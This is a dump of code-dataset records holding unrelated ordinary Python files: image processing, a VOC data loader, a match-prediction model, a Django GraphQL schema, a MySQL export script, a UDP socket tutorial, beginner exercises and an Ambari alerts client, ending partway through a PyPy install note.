contentObj[\"OutputInfo\"]\n returnData = []\n for jItem in jDatas:\n registry = {}\n registry[\"hospitalId\"] = hospitalId\n registry[\"hospitalName\"] = jItem[\"HospitalName\"]\n registry[\"departmentId\"] = jItem[\"DepartmentId\"]\n registry[\"departmentName\"] = jItem[\"DepartmentName\"]\n registry[\"doctorId\"] = jItem[\"DoctorId\"]\n registry[\"doctorName\"] = jItem[\"DoctorName\"]\n registry[\"visitNoon\"] = self.getVisitNoon(jItem[\"TimePartType\"])\n if jItem.get(\"TimePart\"):\n registry[\"visitTime\"] = jItem.get(\"ClinicDate\") + \" \" + jItem.get(\"TimePart\")\n else:\n registry[\"visitTime\"] = jItem.get(\"ClinicDate\")\n registry[\"registryNo\"] = jItem.get(\"AppointmentId\")\n registry[\"hospitalRegistyNo\"] = jItem.get(\"AppointmentId\")\n registry[\"registryStatus\"] = self.getStatus(jItem.get(\"Status\"))\n registry[\"statusReason\"] = jItem.get(\"StatusName\")\n\n returnData.append(registry)\n\n return returnData\n\n def execute(self, meList):\n jsonList = json.loads(meList)\n message = jsonList[0]\n\n # 1 入参转换\n message = self.getRequestParams(message)\n if message[\"returnCode\"] != \"Success\":\n return self.handleResult(message)\n\n # 2 调用webservice\n messageStr = AllHttpClientWriter().execute(json.dumps(message))\n message = json.loads(messageStr)\n if message[\"returnCode\"] != \"Success\":\n return self.handleResult(message)\n\n # 3 结果mapping\n message = self.getResponseParams(message)\n if message[\"returnCode\"] != \"Success\":\n return self.handleResult(message)\n\n\n message[\"extendContent\"] = \"\"\n message[\"returnMsg\"] = u\"查询预约列表成功\"\n return self.handleResult(message)\n\n\nresult = RegistryList().execute(params)\n","sub_path":"whrm/RegistryList.py","file_name":"RegistryList.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"141187324","text":"# Author imagean\n#!/usr/bin/python\n# -*- coding:utf-8\n# opencv read image is BGR channel,and matplot read is RGB\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef homofilter(I):\n I = np.double(cv.cvtColor(I,cv.COLOR_RGB2GRAY))\n (m,n) = I.shape\n rL = 0.5\n rH = 2\n c =2\n d0 = 20\n I1 = np.log(I+1)\n FI = np.fft.fft2(I1)\n n1 = m//2\n n2 = n//2\n D = np.zeros((m,n))\n H = np.zeros((m,n))\n for i in range(m):\n for j in range(n):\n D[i,j]=((i-n1)**2+(j-n2)**2)\n H[i,j]=(rH-rL)*(np.exp(c*(-D[i,j]/(d0**2))))+rL\n\n I2 = np.fft.ifft2(H*FI)\n I3 = np.real(np.exp(I2))\n plt.subplot(1,2,1),plt.imshow(I,cmap='gray'),plt.xticks([]),plt.yticks([]),plt.title('Original Image')\n plt.subplot(1,2,2),plt.imshow(I3,cmap='gray'),plt.xticks([]),plt.yticks([]),plt.title('Homofilter Image')\n plt.show()\n plt.rcParams['font.sans-serif']=['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n\nif __name__ == '__main__':\n\n img = cv.imread('C:/Users/19845/Desktop/lena2.jpg')\n (r,g,b)=cv.split(img) #颜色通道调整\n img = cv.merge([b,g,r])\n homofilter(img)\n\n","sub_path":"Image/06/001HomoFilter.py","file_name":"001HomoFilter.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"220528602","text":"import utils\nimport imageio\nif __name__ == '__main__':\n path = 'Iron_man.jpg'\n image = utils.load_image(path)\n utils.show_image(image)\n # 1.1\n image_head = utils.crop_head(image)\n # 1.2\n utils.show_image(image_head, name='ironmanhead', save=True)\n # 1.3\n image_green = utils.RGBcomponent(image_head, 
RGB='G')\n utils.show_image(image_green, name='ironmanheadgreen', save=True)\n # 1.4\n GRB_image = utils.RGB2GRB(image)\n imageio.imsave('img.png', GRB_image)\n utils.show_image(GRB_image, name='GRBironman', save=True)\n","sub_path":"HW1_submission/Exercise1.py","file_name":"Exercise1.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"149683592","text":"import cv2\nimport numpy as np\nfrom os import path\nimport xml.etree.ElementTree as ET\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nclass VOC07(Dataset):\n def __init__(self,data_dir,split=None,transform=None):\n self.class_name = ['person','bird','cat','cow','dog','horse','sheep','aeroplane','bicycle','boat','bus','car','motorbike','train','bottle','chair','diningtable','pottedplant','sofa','tvmonitor']\n self.data_dir = data_dir\n if split=='train':\n p = path.join(data_dir,'ImageSets','Main','train.txt')\n elif split=='val':\n p = path.join(data_dir,'ImageSets','Main','val.txt')\n else:\n p = path.join(data_dir,'ImageSets','Main','trainval.txt')\n with open(p) as f:\n self.imgs = [img.strip() for img in f.readlines()]\n self.transform = transform\n @property\n def class_num(self):\n return len(self.class_name)\n def __len__(self):\n return len(self.imgs)\n def __getitem__(self,idx):\n name = self.imgs[idx]\n img = path.join(self.data_dir,'JPEGImages',name+'.jpg')\n img = cv2.imread(img)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n anno = path.join(self.data_dir,'Annotations',name+'.xml')\n bbox = []\n label = []\n tree = ET.parse(anno)\n for i in tree.findall('object'):\n box = i.find('bndbox')\n bbox.append([\n int(box.find('ymin').text),\n int(box.find('xmin').text),\n int(box.find('ymax').text),\n int(box.find('xmax').text)\n ])\n label.append(self.class_name.index(i.find('name').text))\n bbox = np.array(bbox)\n label = np.array(label)\n sample = {'image':img,'box':bbox,'label':label}\n if self.transform:\n sample = self.transform(sample)\n return sample\nclass Rescale:\n def __init__(self,output_size):\n self.output_size = output_size\n def __call__(self,sample):\n image = sample['image']\n box = sample['box']\n h,w = image.shape[:2]\n if isinstance(self.output_size,int):\n if h>w:\n new_h, new_w = self.output_size*h//w,self.output_size\n else:\n new_h,new_w = self.output_size,self.output_size*w//h\n else:\n new_w,new_h = self.output_size\n image = cv2.resize(image, (new_w,new_h))\n box = box*[new_h/h,new_w/w,new_h/h,new_w/w]\n return {\n 'image':image,\n 'box':box,\n 'label':sample['label']\n }\nclass RandomCrop:\n def __init__(self,output_size):\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n self.output_size = output_size\n def __call__(self,sample):\n new_w,new_h = self.output_size\n while True:\n image,box,label = sample['image'],sample['box'],sample['label']\n h,w = image.shape[:2]\n top = np.random.randint(0,h-new_h)\n left = np.random.randint(0,w-new_w)\n image = image[top:top+new_h,left:left+new_w]\n box = box-[top,left,top,left]\n box[:,0::2] = np.clip(box[:,0::2],0,new_h)\n box[:,1::2] = np.clip(box[:,1::2],0,new_w)\n box_h = box[:,2]-box[:,0]\n box_w = box[:,3]-box[:,1]\n keep = np.where((box_h>20) & (box_w>20))[0]\n box = box[keep]\n label = label[keep]\n if box.shape[0]!=0:\n break\n return {\n 'image':image,\n 'box':box,\n 'label':label\n }\nclass ToTensor:\n def __call__(self,sample):\n image = np.array(sample['image'])\n image = 
transforms.ToTensor()(image)\n return {\n 'image':image,\n 'box':torch.tensor(sample['box'],dtype=torch.float),\n 'label':torch.tensor(sample['label'],dtype=torch.int64)\n }\nclass Normlize:\n def __init__(self):\n self.normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])\n def __call__(self,sample):\n\n image = sample['image']\n image = self.normalize(image)\n return {\n 'image':image,\n 'box':sample['box'],\n 'label':sample['label']\n }\n\n \nif __name__ == '__main__':\n from torch.utils.data import DataLoader\n from torchvision import transforms\n import matplotlib.pyplot as plt\n from matplotlib.patches import Rectangle\n train_data = VOC07('VOCdevkit/VOC2007',split='train',transform=transforms.Compose([\n Rescale(801),\n RandomCrop((800,600)),\n ToTensor(),\n Normlize(),\n ]))\n data_loader = DataLoader(train_data,batch_size=1)\n for i,sample in enumerate(data_loader):\n print(i)\n # image, boxes = sample['image'][0],sample['box'][0]\n # image = torch.tensor([0.485, 0.456, 0.406]).reshape(-1,1,1) + torch.tensor([0.229, 0.224, 0.225]).reshape(-1,1,1)*image\n # plt.imshow(image.numpy().transpose(1,2,0))\n # plt.show()\n # for i in range(boxes.shape[0]):\n # box = boxes[i]\n # x,y=box[1],box[0]\n # w = box[3]-box[1]\n # h = box[2]-box[0]\n # plt.gca().add_patch(Rectangle((x,y),w,h,fill=False,color='r'))\n #plt.show()","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"349660046","text":"import csv\n\nimport pandas\nimport numpy as np\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import KFold, cross_val_score\nimport datetime\n\nfrom sklearn.preprocessing import StandardScaler\n\ndef data_prepocessing(features):\n features.drop(['duration', 'radiant_win', 'tower_status_radiant', 'tower_status_dire', 'barracks_status_radiant',\n 'barracks_status_dire'], axis=1, inplace=True)\n for k, v in features.count().to_dict().items():\n if v != features.shape[0]:\n print(k, v)\n features.fillna(0, inplace=True)\n\n\ndef gradient_boosting():\n kf = KFold(n_splits=5, shuffle=True, random_state=1)\n best_n = 0\n max_score = 0\n\n for n in np.linspace(10, 100, 10):\n start_time = datetime.datetime.now()\n gbc = GradientBoostingClassifier(n_estimators=int(n), random_state=241, max_depth=2)\n scores = cross_val_score(gbc, features, target, cv=kf, scoring='roc_auc')\n mean_score = scores.mean()\n if max_score < mean_score:\n max_score = mean_score\n best_n = n\n print(n, mean_score)\n print('Time elapsed:', (datetime.datetime.now() - start_time).seconds)\n\n print('best parameters: ', best_n, max_score)\n\n\ndef logistic_regression(C_min, C_max):\n scaler = StandardScaler()\n scaled_features = scaler.fit_transform(features)\n\n kf = KFold(n_splits=5, shuffle=True, random_state=1)\n best_C = 0\n max_score = 0\n\n for C in np.linspace(C_min, C_max, 10):\n start_time = datetime.datetime.now()\n lr = LogisticRegression(penalty='l2', random_state=241, solver='lbfgs', C=C)\n scores = cross_val_score(lr, scaled_features, target, cv=kf, scoring='roc_auc')\n mean_score = scores.mean()\n if max_score < mean_score:\n max_score = mean_score\n best_C = C\n print(C, mean_score)\n print('Time elapsed:', datetime.datetime.now() - start_time)\n\n print('best parameters: ', best_C, max_score)\n\n\nfeatures = pandas.read_csv('./features.csv', 
index_col='match_id')\ntarget = features['radiant_win']\ndata_prepocessing(features)\ngradient_boosting()\n\n'''logistic regression on full data'''\nlogistic_regression(C_min=0.1, C_max=10)#1.0,(0.1, 0.7163838498885824)\n\n\n'''logistic regression on data without categorical features'''\nheroes = []\nfor p in range(5):\n    heroes = np.concatenate((heroes, features['r%d_hero' % (p+1)].unique(), features['d%d_hero' % (p+1)].unique()), axis=None)\n\nheroes = np.unique(heroes)\nheroes_num = int(max(heroes))\nprint(heroes_num, heroes.size)\nX_pick = np.zeros((features.shape[0], heroes_num))\n\nfor i, match_id in enumerate(features.index):\n    for p in range(5):\n        X_pick[i, features.loc[match_id, 'r%d_hero' % (p+1)]-1] = 1\n        X_pick[i, features.loc[match_id, 'd%d_hero' % (p+1)]-1] = -1\n\nfeatures.drop(['lobby_type'], axis=1, inplace=True)\nfor p in range(5):\n    features.drop(['r%d_hero' % (p+1), 'd%d_hero' % (p+1)], axis=1, inplace=True)\nlogistic_regression(C_min=0.1, C_max=10)#(0.1, 0.7518611029875298)\n\n\n'''logistic regression on data with bag of words'''\nfor i in range(heroes_num):\n    features[str(i)] = X_pick[:, i]\nlogistic_regression(C_min=0.1, C_max=10)#(0.1, 0.7518611029875298)\n\n\n'''predicting on test data'''\ntest_features = pandas.read_csv('./features_test.csv', index_col='match_id')\ntest_features.head()\ntest_features.fillna(0, inplace=True)\n\nX_pick = np.zeros((test_features.shape[0], heroes_num))\nfor i, match_id in enumerate(test_features.index):\n    for p in range(5):\n        X_pick[i, test_features.loc[match_id, 'r%d_hero' % (p+1)]-1] = 1\n        X_pick[i, test_features.loc[match_id, 'd%d_hero' % (p+1)]-1] = -1\n\ntest_features.drop(['lobby_type'], axis=1, inplace=True)\nfor p in range(5):\n    test_features.drop(['r%d_hero' % (p+1), 'd%d_hero' % (p+1)], axis=1, inplace=True)\n\nfor i in range(heroes_num):\n    test_features[str(i)] = X_pick[:, i]\nscaler = StandardScaler()\nscaled_features = scaler.fit_transform(features)\nscaled_test_features = scaler.transform(test_features)\n\nlr = LogisticRegression(penalty='l2', random_state=241, C=0.1)\nlr.fit(scaled_features, target)\nprobas = lr.predict_proba(scaled_test_features)[:, 1]\n\nmin_proba = min(probas)\nmax_proba = max(probas)\n\nprint(max_proba, min_proba)\n","sub_path":"week 7. 
Project/win_prediction.py","file_name":"win_prediction.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"222595142","text":"import graphene\nfrom graphene import relay\nfrom graphene_django.filter import DjangoFilterConnectionField\nfrom graphene_django import DjangoObjectType\nfrom django.contrib.auth import get_user_model\nfrom users.schema import UserType\nfrom .models import Location, Activity, Log\n\n# TYPES\n\n\nclass LocationNode(DjangoObjectType):\n class Meta:\n model = Location\n interfaces = (relay.Node,)\n filter_fields = ['name']\n\n\nclass ActivityNode(DjangoObjectType):\n class Meta:\n model = Activity\n interfaces = (relay.Node,)\n filter_fields = ['name']\n\n\nclass LogNode(DjangoObjectType):\n class Meta:\n model = Log\n interfaces = (relay.Node, )\n filter_fields = {\n 'date': ['exact', 'icontains', 'istartswith'],\n 'jailer': ['exact'],\n 'jailer__username': ['exact', 'icontains', 'istartswith'],\n 'activity': ['exact'],\n 'activity__name': ['exact', 'icontains', 'istartswith'],\n 'location': ['exact'],\n 'location__name': ['exact', 'icontains', 'istartswith'],\n 'notes': ['exact', 'icontains'],\n 'deleted': ['exact']\n }\n\n\n# QUERY\n\nclass Query(graphene.ObjectType):\n location = relay.Node.Field(LocationNode)\n locations = DjangoFilterConnectionField(\n LocationNode)\n activity = relay.Node.Field(ActivityNode)\n activities = DjangoFilterConnectionField(\n ActivityNode)\n log = relay.Node.Field(LogNode)\n logs = DjangoFilterConnectionField(LogNode)\n\n\n# MUTATION\n\n\nclass CreateLocation(graphene.relay.ClientIDMutation):\n\n class Input:\n name = graphene.String(required=True)\n\n location = graphene.Field(LocationNode)\n\n def mutate_and_get_payload(self, info, **input):\n location = Location(\n name=input.get('name')\n )\n location.save()\n return CreateLocation(location=location)\n\n\nclass CreateActivity(graphene.relay.ClientIDMutation):\n class Input:\n name = graphene.String(required=True)\n activity = graphene.Field(ActivityNode)\n\n def mutate_and_get_payload(self, info, **input):\n activity = Activity(\n name=input.get('name')\n )\n activity.save()\n return CreateActivity(activity=activity)\n\n\nclass CreateLog(graphene.relay.ClientIDMutation):\n class Input:\n date = graphene.DateTime()\n jailer_username = graphene.String()\n location_name = graphene.String()\n activity_name = graphene.String()\n notes = graphene.String()\n\n log = graphene.Field(LogNode)\n jailer = graphene.Field(UserType)\n\n def mutate_and_get_payload(self, info, **input):\n user = get_user_model()\n log = Log(\n date=input.get('date'),\n jailer=user.objects.get(\n username=input.get('jailer_username')),\n location=Location.objects.get(name=input.get('location_name')),\n activity=Activity.objects.get(name=input.get('activity_name')),\n notes=input.get('notes')\n )\n log.save()\n return CreateLog(log=log)\n\n\nclass Mutation(graphene.AbstractType):\n create_location = CreateLocation.Field()\n create_activity = CreateActivity.Field()\n create_log = CreateLog.Field()\n","sub_path":"logs/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597919492","text":"import datetime\nimport time\n\nimport pandas as pd\n\nimport pymysql\n\n\ndef get_day_list():\n day_list = []\n datestart = datetime.datetime.strptime(start_day, '%Y-%m-%d')\n dateend = 
datetime.datetime.strptime(end_day, '%Y-%m-%d')\n    d = datestart\n    delta = datetime.timedelta(days=1)\n    while d <= dateend:\n        # print(d.strftime(\"%Y-%m-%d\"))\n        day = d.strftime(\"%Y-%m-%d\")\n        day_list.append(day)\n        d += delta\n    return day_list\n\n\nif __name__ == '__main__':\n    start_day = '2019-01-24'\n    end_day = '2019-02-10'\n    # end_day = '2019-01-26'\n    db = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"hotpot\")\n    cursor = db.cursor()\n    # build the list of days between the start and end dates\n    day_list = get_day_list()\n    data_list = []\n    for change_day in day_list:\n        sql = \"\"\"SELECT storeId,storeName,city,city_level from SHOP_DETAIL WHERE storeId in (select DISTINCT storeId from SHOP_WAITE WHERE crawlTime='%s') GROUP BY storeId ;\"\"\" % change_day\n        cursor.execute(sql)\n        results = cursor.fetchall()\n        for data in results:\n            storeName = data[1]\n            city_level = data[3]\n            city = data[2]\n            storeId = str(data[0])\n            crawlTime = change_day\n            data = [storeName, city_level, city, storeId, crawlTime ]\n            data_list.append(data)\n    print(data_list)\n    # write the results to a file\n    import csv\n    filename = '海底捞门店数' + str(int(time.time())) + '.csv'\n    with open(filename, 'w', newline='') as f:\n        writer = csv.writer(f)\n        head_list = ['店铺名字', '城市级别', '城市', '店铺ID', '抓取时间']\n        writer.writerow(head_list)\n        for row in data_list:\n            writer.writerow(row)\n    csv_data = pd.read_csv(filename,\n                           engine='python')  # pandas' read_csv() defaults to the C parser engine,\n    # which can fail when the file name contains Chinese characters; passing engine='python' avoids the problem.\n    csv_data.to_excel(filename.replace('csv', 'xlsx'), index=False)\n","sub_path":"IDGdemo/数据库整理/海底捞/5.海底捞获取门店数.py","file_name":"5.海底捞获取门店数.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"534457836","text":"# Task 3. 
Shortest Word\n\ndef shortest_words():\n\n    while True:\n        user_string = input(\"Please enter the non-empty string: \\n\")\n        if not user_string:\n            continue\n        else:\n            break\n\n    string_to_list = user_string.split()\n\n    len_list = []\n    for word in string_to_list:\n        len_list.append(len(word))\n\n    \n    print(f\"The length of the shortest word(s) is {min(len_list)}\")\n    \nshortest_words()\n","sub_path":"homework3/hw_3_3.py","file_name":"hw_3_3.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540382215","text":"#Program to Split the array and add the first part to the end\nimport array\nimport logging as l\nl.basicConfig(filename='arr4.log', level=l.INFO, format='%(asctime)s-%(message)s')\na=[1,2,3,4,5]\na1=[]\nshift=2\nprint(\"The original array\",a) \n\nfor i in range(0,shift):\n    while(a[i]<=2):\n        temp=a[i]\n        a1.append(temp)\n        a.remove(a[i])\n        print(\"The split array of 2 indexes \", a1)\nprint(\"The original array after the split\",a) \n\ntry:\n    sumofarray=[]\n    sumofarray=a+a1\n    print(\"The sum of array is:\",sumofarray)\n    \nexcept Exception as e:\n    l.error(e)\n\n\n\n\n    \n ","sub_path":"arr4.py","file_name":"arr4.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"417674506","text":"import math\nimport re\nimport time\nimport os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\n\ndef hello(name):\n    if type(name) != str:\n        raise TypeError(\"Not a string\")\n    correct_name = name.strip()\n    if len(correct_name) == 0 or len(correct_name) >= 20:\n        raise ValueError(\"Not a valid string\")\n    welcome_message = 'Hello ' + correct_name + '!'\n    return welcome_message\n\ndef calculate_hypotenuse(a, b):\n    c = math.sqrt(a**2 + b**2)\n    return c\n\ndef are_all_conditions_true(conditions):\n    if type(conditions) == type(None) or len(conditions) == 0:\n        return None\n    for x in conditions:\n        if x == False:\n            return False\n    return True\n\ndef is_a_condition_true(conditions):\n    if len(conditions) == 0:\n        return None\n    for x in conditions:\n        if x == True:\n            return True\n    return False\n\ndef filter_integers_greater_than(l, n):\n    filter_list = []\n    for x in l:\n        if x>n:\n            filter_list.append(x)\n    return filter_list\n\ndef find_cheapest_hotels(hotel_daily_rates, maximum_daily_rate):\n    min_hotel = []\n\n    for hotel in hotel_daily_rates:\n        if hotel[1] <= maximum_daily_rate:\n            min_hotel.append(hotel)\n\n    min_hotel = sorted(min_hotel, key=lambda item:item[1])\n    value = []\n    for i in range(len(min_hotel)):\n        value.append(min_hotel[i][0])\n\n    return value\n\ndef calculate_euclidean_distance_between_2_points(p1, p2):\n    euclidean_distance = math.sqrt((p1[0]-p2[0])**2 +(p1[1]-p2[1])**2)\n    return euclidean_distance\n\ndef calculate_euclidean_distance_between_points(points):\n    if len(points)<2:\n        raise ValueError('The list MUST contain at least 2 points')\n\n    sum_length = 0\n    for i in range(len(points) - 1):\n        j = i + 1\n        sum_length += calculate_euclidean_distance_between_2_points(points[i], points[j])\n\n    return sum_length\n\ndef capitalize_words(s):\n    if type(s) == type(None):\n        return None\n    if type(s) != str:\n        
raise TypeError(\"Not a string\")\n\n s = s.split()\n for i in range(len(s)):\n if i%2==0:\n s[i] = s[i].upper()\n else:\n s[i] = s[i].lower()\n return \" \".join(s)\n\ndef factorial(n):\n if type(n) != int:\n raise TypeError(\"Not an integer\")\n elif n<0:\n raise ValueError(\"Not a positive integer\")\n\n if n == 0 or n == 1:\n return 1\n \n return n*factorial(n-1)\n\ndef char_to_int(c):\n if type(c) != str:\n raise TypeError(\"Not a string\")\n elif len(c) > 1:\n raise ValueError(\"Not a single digit\")\n\n value = ord(c)\n if (value < 48 or value > 57):\n raise ValueError(\"Not a positive integer string expression\") \n\n return value - 48\n\ndef string_to_int(s):\n if type(s) != str:\n raise TypeError(\"Not a string\")\n\n value = 0\n for i in range(len(s)):\n value += char_to_int(s[i])\n value *= 10\n value //= 10\n return value\n\ndef is_palindrome(value):\n if type(value) == type(None):\n return False\n\n value = str(value)\n value = (\"\".join(re.split('\\W', value))).lower()\n if len(value) == 0:\n return False\n \n if len(value) % 2 == 0:\n count = len(value)//2\n else:\n count = len(value)//2 - 1\n\n for i in range(count):\n if value[i] != value[-i-1]:\n return False\n\n return True\n\n\ndef roman_numeral_to_int(roman_numeral):\n if not(isinstance(roman_numeral, str)) or len(roman_numeral) == 0:\n raise TypeError(\"Not a string\")\n roman_list = {\n 'N': 0,\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n for i in range(len(roman_numeral)):\n if roman_list.get(roman_numeral[i]) == None:\n raise ValueError(\"Not a Roman numeral\")\n count = 1\n for i in range(len(roman_numeral)-1):\n if roman_numeral[i] == roman_numeral[i+1]:\n count += 1\n else:\n count = 1\n if count == 4:\n raise ValueError(\"Not a Roman numeral\")\n \n \n value = 0\n i = 0\n while i < len(roman_numeral) - 1:\n s1 = roman_list[roman_numeral[i]]\n s2 = roman_list[roman_numeral[i+1]]\n if s1 >= s2:\n if (s1 + s2) == 10 or (s1+s2) == 100 or (s1+s2) == 1000:\n raise ValueError(\"Not a Roman numeral\")\n value += s1\n else:\n minus = s2 - s1\n if minus == 4 or minus == 9 or minus == 40 or minus == 90 or minus == 400 or minus == 900: \n i += 1\n value = value + minus\n else:\n raise ValueError(\"Not a Roman numeral\")\n i += 1\n\n if i == len(roman_numeral) - 1:\n value += roman_list[roman_numeral[i]]\n\n return value\n\ndef play_melody(melody, sound_basedir):\n if not(isinstance(melody, list) or isinstance(melody, tuple)) or len(melody) <= 1:\n raise TypeError(\"Not a string\")\n for i in range(len(melody)):\n if not(isinstance(melody[i], str)):\n raise TypeError(\"Not a string\")\n\n for i in range(len(melody)):\n if len(melody[i]) <= 1 or len(melody[i]) > 3:\n raise ValueError(\"Not a valid melody\")\n available_melody = ['A', 'B', 'C' , 'D', 'E', 'F', 'G']\n if melody[i][0] not in available_melody:\n raise ValueError(\"Not a valid melody\")\n if len(melody[i]) == 2:\n if int(melody[i][1]) < 2 or int(melody[i][1]) > 5:\n raise ValueError(\"Not a valid melody\")\n else:\n if melody[i][1] != 'B' and melody[i][1] != '#':\n raise ValueError(\"Not a valid melody\")\n if int(melody[i][2]) < 2 or int(melody[i][2]) > 5:\n raise ValueError(\"Not a valid melody\")\n if (melody[i][0] == 'E' and melody[i][1] == '#') or (melody[i][0] == 'F' and melody[i][1] == 'B') or (melody[i][0] == 'B' and melody[i][1] == '#') or (melody[i][0] == 'C' and melody[i][1] == 'B'):\n raise ValueError(\"Not a valid melody\")\n\n pygame.mixer.init()\n list_sound = []\n for i in range(len(melody)):\n cur_melody = 
melody[i].lower()\n if cur_melody[1] == '#':\n cur_melody = list(cur_melody)\n cur_melody[1] = 'b'\n if cur_melody[0] == 'c':\n cur_melody[0] = 'd'\n elif cur_melody[0] == 'd':\n cur_melody[0] = 'e'\n elif cur_melody[0] == 'e':\n cur_melody[0] = 'f'\n elif cur_melody[0] == 'f':\n cur_melody[0] = 'g'\n elif cur_melody[0] == 'g':\n cur_melody[0] = 'a'\n elif cur_melody[0] == 'a':\n cur_melody[0] = 'b'\n elif cur_melody[0] == 'b':\n cur_melody[0] = 'c'\n cur_melody[2] = str(int(cur_melody[2])+1)\n cur_melody = ''.join(cur_melody)\n cur_sound = sound_basedir + '/' + cur_melody + '.ogg'\n list_sound.append(cur_sound)\n sound = pygame.mixer.Sound(cur_sound)\n sound.play()\n time.sleep(0.4)\n pygame.time.delay(400)\n \n\n return list_sound\n\n\n","sub_path":"python_basics.py","file_name":"python_basics.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491125119","text":"import requests\nimport json\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\ndef getServicesAlert(nodeName, port, clusterName, auth_values, https, verify):\n\n if https == \"n\":\n\n url = \"http://\" + nodeName + \":\" + port + \"/api/v1/clusters/\" + clusterName + \"/alerts\"\n\n elif https == \"y\":\n\n url = \"https://\" + nodeName + \":\" + port + \"/api/v1/clusters/\" + clusterName + \"/alerts\"\n\n else:\n\n exit(\"[servicesAlert] could not run: bad value provided. Please check the https var\")\n\n querystring = {\"fields\": \"*\"}\n\n headers = {\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"7eb64f13-6076-4c96-a5c3-d0de174b5df9\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring, auth=auth_values, verify=verify)\n\n result = json.loads(response.text)\n\n return result\n","sub_path":"servicesAlert/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"611946066","text":"from itertools import filterfalse\nFILENAME = 'B-large'\n\n\ndef optimal_choises(stack):\n stack = list(map(lambda x: x == '+', stack))\n # print(stack)\n changes = 0\n while len(list(filterfalse(lambda x: x, stack))):\n changes += 1\n if len(stack) == len(list(filterfalse(lambda x: x, stack))):\n stack[:] = list(map(lambda x: not x, stack[:][::-1]))\n # print(stack)\n return changes\n same_pancakes = 1\n while stack[same_pancakes] == stack[0]:\n same_pancakes += 1\n stack[:same_pancakes] = list(map(lambda x: not x, stack[:same_pancakes][::-1]))\n # print(stack)\n # print(list(map(lambda x: not x, stack[:same_pancakes][::-1])))\n # break\n\n return changes\n\nwith open('{}.in'.format(FILENAME), 'r') as f:\n input = f.read().split()\n\nwith open('{}.out'.format(FILENAME), 'w') as f:\n for test_case in range(1, int(input[0]) + 1):\n out = optimal_choises(input[test_case])\n f.write('Case #{num}: {value}\\n'.format(num=test_case, value=out))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_hodlin_run.py","file_name":"16_0_2_hodlin_run.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643694691","text":"import socket\n\n\ndef main():\n # 1. create a UDP socket\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # 2. bind local address info (the local address must be bound)\n local_addr = ('', 7788)\n udp_socket.bind(local_addr)\n # 3. receive data\n recv_data = 
udp_socket.recvfrom(1024)\n # recv_data is a tuple: (received data, (sender ip, port))\n recv_msg = recv_data[0] #data\n send_addr = recv_data[1] #addr\n # 4. print the received data\n # print(\"%s:%s\" % (str(send_addr), recv_msg.decode(\"utf-8\"))) note that Windows defaults to gbk encoding\n print(\"%s:%s\" % (str(send_addr), recv_msg.decode(\"gbk\")))\n # 5. close the socket\n udp_socket.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"01-网络编程/01-网络编程-UDP/06-解析接收的UDP消息.py","file_name":"06-解析接收的UDP消息.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"622699486","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author: liutienan\n@Date: 2018-06-08 10:18:22\n@Last Modified by: liutienan\n@Last Modified time: 2018-06-08 10:18:22\n\"\"\"\n\"\"\"\nHow to install PyPy?\n1. Create a pypy environment with Anaconda: conda create -n pypy python=3.5\n2. Download the release: wget https://bitbucket.org/pypy/pypy/downloads/pypy3-v6.0.0-linux64.tar.bz2\n3. Unpack it: tar -xf pypy3-v6.0.0-linux64.tar.bz2\n4. Copy the unpacked directory into ~/anaconda3/envs/pypy/, merging directories that share a name.\n5. Activate the pypy environment: source activate pypy\nNote: installing PyPy on mac/windows works the same way; note that the 32-bit Windows PyPy also runs on 64-bit win7.\n\"\"\"\nfrom time import time\nfrom math import ceil\nfrom random import 